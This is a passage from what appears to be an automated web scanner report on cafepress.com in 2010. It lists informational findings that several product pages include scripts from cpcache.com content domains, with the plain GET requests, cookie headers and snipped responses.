__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 69583
Date: Sun, 26 Dec 2010 13:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 69583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.58. http://www.cafepress.com/make/custom-ipad-case
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-ipad-case
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 55427
Date: Sun, 26 Dec 2010 13:48:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
<!-- Column 2 starts --> <script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.59. http://www.cafepress.com/make/custom-iphone-cases
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-iphone-cases
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 57068 Date: Sun, 26 Dec 2010 13:48:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57068 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <![endif]--> <script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]... <link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.60. http://www.cafepress.com/make/custom-mugs
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-mugs
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-mugs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 53712 Date: Sun, 26 Dec 2010 13:47:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 53712 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <![endif]--> <script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]... <link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.61. http://www.cafepress.com/make/custom-stickers
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-stickers
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 55145 Date: Sun, 26 Dec 2010 13:47:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55145 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <![endif]--> <script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]... <link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.62. http://www.cafepress.com/make/custom-stockings
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-stockings
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-stockings HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 52596 Date: Sun, 26 Dec 2010 13:48:04 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 52596 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <![endif]--> <script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]... <link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.63. http://www.cafepress.com/make/custom-t-shirts
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-t-shirts
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /make/custom-t-shirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
